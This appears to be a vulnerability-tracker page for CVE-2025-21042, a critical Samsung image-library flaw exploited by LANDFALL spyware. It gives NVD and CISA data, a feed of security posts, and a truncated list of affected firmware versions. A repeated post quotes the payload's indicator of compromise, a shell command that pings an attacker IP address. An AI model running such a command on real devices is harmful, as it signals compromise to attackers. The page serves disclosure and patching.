CVE-2025-21042
Published Sep 12, 2025
Last updated 2 months ago
AI description
CVE-2025-21042 is an out-of-bounds write vulnerability found in Samsung's libimagecodec.quram.so library. This library is responsible for handling image parsing and decoding on Samsung Galaxy devices. The vulnerability is triggered when processing a specially crafted image file, leading to a write operation outside the allocated memory boundaries. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on affected devices. This can be achieved through various channels such as email attachments, messaging apps, or web browsing, where the device processes an attacker-supplied image. A patch has been released in the SMR Apr-2025 Release 1 security update to address this vulnerability.
- Description
- Out-of-bounds write in libimagecodec.quram.so prior to SMR Apr-2025 Release 1 allows remote attackers to execute arbitrary code.
- Source
- mobile.security@samsung.com
- NVD status
- Analyzed
- Products
- android
CVSS 3.1
- Type
- Primary
- Base score
- 9.8
- Impact score
- 5.9
- Exploitability score
- 3.9
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Severity
- CRITICAL
Data from CISA
- Vulnerability name
- Samsung Mobile Devices Out-of-Bounds Write Vulnerability
- Exploit added on
- Nov 10, 2025
- Exploit action due
- Dec 1, 2025
- Required action
- Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- nvd@nist.gov
- CWE-787
- Hype score
- Not currently trending
A look at an Android ITW DNG exploit. Quram library exploit technical details (CVE-2025-21042) https://t.co/DvczPhO6JZ #infosec https://t.co/o7WF0vM8w7
@0xor0ne
4 Jan 2026
5609 Impressions
20 Retweets
99 Likes
47 Bookmarks
2 Replies
0 Quotes
A look at an Android ITW DNG exploit CVE-2025-21042 Vulnerability In QuramDngOpcodeDeltaPerColumn::processArea (in https://t.co/Y1BDrvsNGY) Payload ioc: /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92[.]35 >/dev/null & ' https://t.co/menf2T
@minacrissDev_
16 Dec 2025
267 Impressions
0 Retweets
2 Likes
1 Bookmark
0 Replies
0 Quotes
#Malware #VulnerabilityReport Zero-Click Samsung Zero-Day (CVE-2025-21042) Delivered LANDFALL Spyware Via Malicious DNG Images https://t.co/5lF7HGEeYh
@Komodosec
15 Dec 2025
9 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
A look at an Android ITW DNG exploit CVE-2025-21042 Vulnerability In QuramDngOpcodeDeltaPerColumn::processArea (in https://t.co/Y1BDrvsfRq) Payload ioc: /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92[.]35 >/dev/null & ' https://t.co/jHNG4C
@minacrissDev_
13 Dec 2025
424 Impressions
0 Retweets
4 Likes
5 Bookmarks
0 Replies
0 Quotes
Unit 42 uncovers LANDFALL: Android spyware via WhatsApp DNG zero-day (CVE-2025-21042) on Samsung. Mid-2024 ops hit Middle East—full device surveillance. Patched; IOCs out. Vet images, update firmware. #CyberSec #Spyware https://t.co/cj3OwOrMsU
@exc_actual
29 Nov 2025
1 Impression
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Des pirates ont exploité une faille de 0 Day (CVE-2025-21042) dans les téléphones Samsung Galaxy en utilisant une seule image WhatsApp malveillante pour obtenir un accès sans clic. Samsung a mis en place un correctif en avril 2025. Mettez-le à jour dès maintenant. https:/
@BoxCyber27484
23 Nov 2025
0 Impressions
0 Retweets
1 Like
0 Bookmarks
0 Replies
0 Quotes
Actively exploited CVE : CVE-2025-21042
@transilienceai
23 Nov 2025
20 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
Actively exploited CVE : CVE-2025-21042
@transilienceai
22 Nov 2025
17 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
“Dikkat! CL-UNK-1054 adlı casusluk grubu, CVE-2025-21042 ile Samsung cihazlarda Landfall casus yazılımı dağıtıyor. WhatsApp resime tıklamanız bile yetebilir! 👀 #SiberGüvenlik #CyberSec #BilgiGüvenliği #Hacker #Türkiye” https://t.co/p0gZ8H5u1R
@siberdirenisTR
21 Nov 2025
3 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Zero-Click-Angriffe nehmen rasant zu Die neuesten Sicherheitsupdates von Google, Apple & Samsung bestätigen: Angreifer nutzen Schwachstellen völlig unbemerkt aus – keine Klicks, keine Downloads, keine Warnungen. Samsungs CVE-2025-21042 ist nur ein Beispiel, das bereits a
@KvinneGmbh
18 Nov 2025
13 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 LANDFALL [Critical] Nov 18, 2025 LANDFALL is a sophisticated Android spyware targeting Samsung Galaxy devices, exploiting a zero-day vulnerability (CVE-2025-21042) in the https://t.co/YpgEURdsKY image processing library. The spyware is delivered via malicious DNG image https
@transilienceai
18 Nov 2025
29 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Hackers Hijack Samsung via Image — One Photo. Zero Clicks. Full Control. A new cyberattack named LANDFAIL (CVE-2025-21042) has been discovered, targeting Samsung Galaxy devices (S22, S23, S24 & Z series running Android 13–15). Hackers exploited a zero-day flaw using
@v3n0m30
17 Nov 2025
15 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
Hackers hijack Samsung via Image - One Photo , Zero Click. Full Control A new Cyberattack named LANDFAIL ( CVE-2025-21042) has been discovered, targeting Samsung Galaxy devices ( S22 , S23 , S24 & Z-seriesrumning Android 13-15) https://t.co/wseaOiWgN0
@Itz_Real_Hari
17 Nov 2025
154 Impressions
0 Retweets
4 Likes
0 Bookmarks
0 Replies
0 Quotes
Actively exploited CVE : CVE-2025-21042
@transilienceai
17 Nov 2025
18 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
.@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS
@SCMagazine
16 Nov 2025
567 Impressions
0 Retweets
1 Like
0 Bookmarks
0 Replies
0 Quotes
Actively exploited CVE : CVE-2025-21042
@transilienceai
16 Nov 2025
23 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
新たなスパイウェアLANDFALLがSamsung機器へのゼロデイ攻撃で使われる(CVE-2025-21042) https://t.co/nRw6oiorvA
@GbeCbo8fNq69403
15 Nov 2025
5 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
新たなスパイウェアLANDFALLがSamsung機器へのゼロデイ攻撃で使われる(CVE-2025-21042) | Codebook|Security News
@GbeCbo8fNq69403
15 Nov 2025
7 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Actively exploited CVE : CVE-2025-21042
@transilienceai
15 Nov 2025
10 Impressions
0 Retweets
0 Likes
0 Bookmarks
1 Reply
0 Quotes
.@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS
@SCMagazine
14 Nov 2025
478 Impressions
1 Retweet
0 Likes
0 Bookmarks
0 Replies
0 Quotes
.@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS
@SCMagazine
13 Nov 2025
462 Impressions
3 Retweets
2 Likes
0 Bookmarks
0 Replies
0 Quotes
💡 كيف يستغلّ الهاكرز ثغرة في أجهزة Samsung للوصول إلى الهاتف وتشغيل Spyware؟ 🔹 الثغرة CVE-2025-21042 اكتشفت في المكتبة الخاصة بمعالجة الصور. بمجرد فتح صورة DNG خبيثة ي
@xabdul
13 Nov 2025
4493 Impressions
8 Retweets
89 Likes
60 Bookmarks
4 Replies
0 Quotes
⚠️ CVE-2025-21042 🖥️ Samsung Galaxy 0day vulnerability exploited by LandFall spyware 💬 allows attackers to remotely compromise Samsung devices, install spyware, and exfiltrate messages, calls, and app data 🔗 https://t.co/JNU7pQCL15 The flaw enables privilege esca
@ransomnews
13 Nov 2025
218 Impressions
0 Retweets
3 Likes
1 Bookmark
0 Replies
0 Quotes
Unit 42が、Samsung製Androidの画像ライブラリのゼロデイ脆弱性CVE-2025-21042を悪用する未知のAndroidスパイウェア「LANDFALL」を発見。 これは本キャンペーンとインプラントに関する初の公開分析です。 詳細はこちら: h
@unit42_jp
13 Nov 2025
1019 Impressions
4 Retweets
8 Likes
4 Bookmarks
0 Replies
0 Quotes
#threatreport #MediumCompleteness CVE-2025-21042: Samsung Galaxy Zero-Day Exploited in LANDFALL Spyware Campaign | 12-11-2025 Source: https://t.co/smuVhp2om3 Key details below ↓ 💀Threats: Landfall, 🎯Victims: Mobile users, Samsung galaxy users 🏭Industry: Government
@rst_cloud
13 Nov 2025
73 Impressions
0 Retweets
1 Like
0 Bookmarks
1 Reply
0 Quotes
Zero-click Samsung flaw (CVE-2025-21042) used to deliver LANDFALL spyware via WhatsApp images — can exfiltrate calls, mic, photos & location. Update your Galaxy now and heed vendor patches. 🔗 https://t.co/SpNNCvpSXO #MobileSecurity #Android #spyware https://t.co/L3EAQqix
@sctocs25
12 Nov 2025
1 Impression
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🔐🪟 SIGNALS WEEKLY: Keys. Gates. Windows. Actively exploited Win kernel EoP ✅ (CVE-2025-62215). Cisco RA-VPN bugs can reload unpatched edges. LANDFALL used Samsung’s image bug (CVE-2025-21042). Which breaks first in your shop? Read -> https://t.co/JrOdxeJL8a #Alph
@alphahunt_io
12 Nov 2025
43 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
⚠️Vulnerabilidad en productos Samsung ❗CVE-2025-21042 ➡️Más info: https://t.co/GDQrivAMkd https://t.co/hbSwtHiE12
@CERTpy
12 Nov 2025
81 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🛡️ LandFall Casus Yazılım Kampanyası: Samsung Galaxy Cihazlarını Hedef Alan Yeni 0-Day Tehdidi Siber güvenlik araştırmacıları, Samsung Galaxy cihazlarını hedef alan ve hâlihazırda aktif olarak istismar edilen kritik bir güvenlik açığını ortaya çıkardı
@ahmetgulerpy
12 Nov 2025
0 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
A severe flaw (CVE-2025-21042) in Samsung’s image library lets hackers use .DNG files to install LANDFALL spyware on Galaxy S22, S23, S24 & Z Fold/Flip 4. 📱 Updated since April 2025? You’re safe. 👉 Go to Settings > Software update > Download and install #Cyber
@sowravu_suresh
12 Nov 2025
29 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
انتشار آسیب پذیری از نوع RCE با کد شناسایی CVE-2025-21042 در گوشی های سامسونگ . علت آسیب پذیری وجود ضعف در یکی از library ها به نام libimagecodec می باشد. برای امن سازی گوشی سا
@EthicalSafe
11 Nov 2025
33 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
📝 𝐏𝐚𝐭𝐜𝐡 𝐧𝐨𝐰: 𝐒𝐚𝐦𝐬𝐮𝐧𝐠 𝐳𝐞𝐫𝐨-𝐝𝐚𝐲 𝐥𝐞𝐭𝐬 𝐚𝐭𝐭𝐚𝐜𝐤𝐞𝐫𝐬 𝐭𝐚𝐤𝐞 𝐨𝐯𝐞𝐫 𝐲𝐨𝐮𝐫 𝐩𝐡𝐨𝐧𝐞 • CVE-2025-21042 is actively exploited as a zero-da
@PurpleOps_io
11 Nov 2025
40 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
CISA: Patch Samsung flaw exploited to deliver spyware (CVE-2025-21042) https://t.co/gMJRzqqVYC #HelpNetSecurity #Cybersecurity https://t.co/zMw3DEisgw
@PoseidonTPA
11 Nov 2025
31 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
KEVに追加されたCVE-2025-21042/LANDFALL事件は、ゼロクリック攻撃 × 民間スパイウェア × メディア処理の脆弱性という新たな組み合わせの脅威モデルを提示しました。 https://t.co/yhASckIjJd Samsung端末を利用する組織は
@t_nihonmatsu
11 Nov 2025
705 Impressions
1 Retweet
6 Likes
2 Bookmarks
0 Replies
0 Quotes
csirt_it: ‼️ #Exploited: rilevato lo sfruttamento attivo in rete della vulnerabilità CVE-2025-21042, che interessa dispositivi #Samsung con S.O. #Android Rischio: 🟠 Tipologia: 🔸 Arbitrary Code Execution 🔗https://t.co/7x1H9nCNOZ ⚠️ Importante… https:/
@Vulcanux_
11 Nov 2025
20 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 CVE-2025-21042 Out-of-bounds write in https://t.co/IevH2sfTwf prior to SMR Apr-2025 Release 1 allows remote attackers to execute arbitrary code. #InfoSec #CyberSec #CyberSecurity
@AnonOzzyDude
11 Nov 2025
8 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Android-Spionage: Neue Malware LANDFALL zielt auf Samsung-Geräte ab Forscher von Unit 42 haben eine bisher unbekannte Android-Spyware namens LANDFALL identifiziert, die gezielt Samsung-Geräte angreift. Die Malware wurde über eine Zero-Day-Sicherheitslücke (CVE-2025-21042) in
@tec4net
11 Nov 2025
33 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Samsung RCE Alert (CVE-2025-21042) Out-of-bounds write in https://t.co/wylhIwA1Xc lets attackers run code on Samsung devices (Android 13+). CVSS 9.8 — patch now! 🔗 https://t.co/1jwf5oPSOl #CyberSecurity #ZeroDay #PatchNow #mobilesecurity
@PMinister12
11 Nov 2025
0 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
⚡️ Cybersecurity Developments in the Last 12 Hours ⚡️ 🚨 CISA ordered federal agencies to patch a critical Samsung zero-day (CVE-2025-21042) exploited to deliver LandFall spyware via malicious DNG images, impacting multiple Galaxy flagship models. 👾 Microsoft resea
@greytech_ltd
11 Nov 2025
46 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Latest Known Exploited Vulnerabilities (#KEV) : #CVE-2025-21042 #Samsung Mobile Devices Out-of-Bounds Write Vulnerability https://t.co/WUmwUhUZNm
@ScyScan
10 Nov 2025
8 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🛡️ We added Samsung mobile devices out-of-bounds write vulnerability CVE-2025-21042 to our Known Exploited Vulnerabilities Catalog. Visit https://t.co/myxOwap1Tf & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec https://t.co/H5lyCxzwJy
@CISACyber
10 Nov 2025
7580 Impressions
25 Retweets
78 Likes
10 Bookmarks
2 Replies
0 Quotes
یک آسیبپذیری امنیتی در دستگاههای اندروید سامسونگ گلکسی که اکنون رفع شده، به عنوان zero-day برای توزیع بدافزار جاسوسی اندروید با نام LANDFALL در حملات هدفمند د
@Teeegra
10 Nov 2025
3695 Impressions
3 Retweets
28 Likes
7 Bookmarks
0 Replies
1 Quote
Le spyware Landfall a infecté pendant près d’un an certains Samsung Galaxy via la vulnérabilité zero-day CVE-2025-21042, permettant un accès furtif aux données, au micro et à la localisation. https://t.co/hr45tiNVOm
@cert_ist
10 Nov 2025
35 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
⚠️ Samsung Galaxy users update now! • New zero-click spyware “LANDFALL” spreading via WhatsApp • Exploits hidden flaw (CVE-2025-21042) in Galaxy S22–S24, Z Fold 4 & Flip 4 • Hackers can access your mic, photos & chats no clicks needed • Fix already roll
@TechAI_Daily
10 Nov 2025
75 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
A zero-day (CVE-2025-21042, CVSS 9.8) in #SamsungGalaxy devices was exploited to deploy #LANDFALL spyware via malicious DNG images. The flaw in libimagecodec.quram[.]so enables RCE, granting full device compromise. Linked to Stealth Falcon infrastructure. https://t.co/4EP9tC8x2c
@MeridianEU
10 Nov 2025
6 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Unit 42 uncovers the new LANDFALL Android spyware delivered as DNG images that exploit CVE-2025-21042 in Samsung devices. https://t.co/qFWkEUFMxC https://t.co/B3t7lmnlWT
@virusbtn
10 Nov 2025
3032 Impressions
13 Retweets
51 Likes
5 Bookmarks
1 Reply
2 Quotes
📲 @SamsungMobile patched a flaw (CVE-2025-21042) used to deploy LANDFALL Android spyware. Attackers exploited the zero-day via malicious DNG images sent over WhatsApp, targeting Galaxy S22–S24 devices. Stay aware. Follow @TechNadu for factual cybersecurity coverage. https:/
@TechNadu
10 Nov 2025
77 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Samsung Zero-Day (CVE-2025-21042) Allows spyware install via malicious image (RCE). Affects: S22-S24, Fold4, Flip4. Fix: April 2025 update. Patch NOW. Full breakdown on LinkedIn: https://t.co/BAw7lmj2Un #Cybersecurity #Android #ZeroDay
@damzydevsec
10 Nov 2025
20 Impressions
0 Retweets
0 Likes
1 Bookmark
0 Replies
0 Quotes
三星Galaxy手机曝“零点击”漏洞,黑客利用图片攻击,CVE-2025-21042,影响S22-S24等机型,三星已发布安全补丁。 #三星Galaxy #零点击攻击 #Landfall漏洞 https://t.co/XGxHjaeAQe
@guijitoutiao
10 Nov 2025
19 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
A Samsung Galaxy zero-day (CVE-2025-21042) was used to install LANDFALL spyware via crafted image files with zero user interaction. Mobile fleets must patch, restrict media attachments, and monitor device behaviour. #MobileSecurity #ZeroClick #Android #ThreatIntel https://t.co/4q
@Prevent_Cyber
10 Nov 2025
21 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
[
{
"nodes": [
{
"negate": false,
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "FDA1685E-D101-46F6-8857-7F0894E07748"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "DF85AA7B-E1C7-4946-92B4-E4D545CAACDF"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "34114DDC-DCDA-4306-8D23-2E628873171F"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "B6871BC1-19F4-4F0C-88D8-4000590D8D5A"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jun-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "9FA72654-2389-4709-BC70-59EC4349A826"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jun-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "85E4E8C1-749F-4A1C-8333-6BAFBF8B64D1"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-jun-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "E346DCBD-7DEB-464F-B917-8624BE87D646"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-mar-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "79C89A24-B07F-43D2-AE83-8F4F03D6C114"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-mar-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "5F73D594-178F-4FC8-9F40-0E545E2647B0"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-mar-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "5697984D-08BA-412F-9BDF-26B658B0ADBC"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-may-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "E4187BA1-226E-4976-A642-2F6DAE85538E"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-may-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "3F3EF3F1-4E54-46E3-A308-69656A29FBD2"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-may-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "73F22C26-52FC-42A7-B263-0CC7770A8C6A"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-may-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "7EB4C4CE-7B3C-4573-87CD-28FC67B777FD"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-nov-2021-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "BFB2B338-5E04-4136-939F-749A3B163656"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-nov-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "D2B24866-2B3A-4A1A-8B75-EF7A7541797A"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-nov-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "3D30C02C-91FB-4D29-AF49-7903158E8FEB"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-nov-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "2F5CA412-BAAF-4378-8ECD-95A404D4E19B"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-oct-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "EBB29F18-A929-432B-B20C-365401E6CA12"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-oct-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "2B6D9064-844B-4D3F-AAE4-D170DF45EF8D"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-oct-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "C908A5B3-C47B-4DA1-A62F-F8FD77FF960D"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-sep-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "4C17A088-2CA1-4818-940F-2FEFA881D598"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-sep-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "C581B7EE-CD08-4D6E-8858-EA8FA631F84C"
},
{
"criteria": "cpe:2.3:o:samsung:android:13.0:smr-sep-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "1DD187E2-2655-407D-87F9-135A9D45F783"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:-:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "3093F6FE-C562-4F62-97B7-CA0D2DDF9BBE"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-apr-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "9CBFF102-91A9-4BCC-BB43-912896BFCCEA"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-apr-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "DAB2A0D7-8F4F-4128-AE09-D2658D793BF7"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-apr-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "6A89AE5B-4D1A-4ADA-B572-38B1FC4ED54C"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-aug-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "401980A7-E64A-4773-83EB-C93B50AE0F73"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-aug-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "CC6E2FC7-2BAF-4C7B-9E0F-D9F844041A35"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-aug-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "6E12AB0B-728A-4478-B237-78CBAA2A44C5"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-dec-2021-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "0501033A-0D51-41E8-91A9-E72B6EE3F78D"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-dec-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "2A901EFE-90BA-474C-88D2-8A3E7D99C0E7"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-dec-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "DF7B3213-520A-49F0-A183-C73A37A56854"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-dec-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "9AB6398C-6A3E-4146-9A5C-595BE36047BA"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-feb-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "30F706F3-34F6-4D43-AE5E-C202C700A333"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-feb-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "FD8B9CD3-063E-481E-BE7C-1628ADA71849"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-feb-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
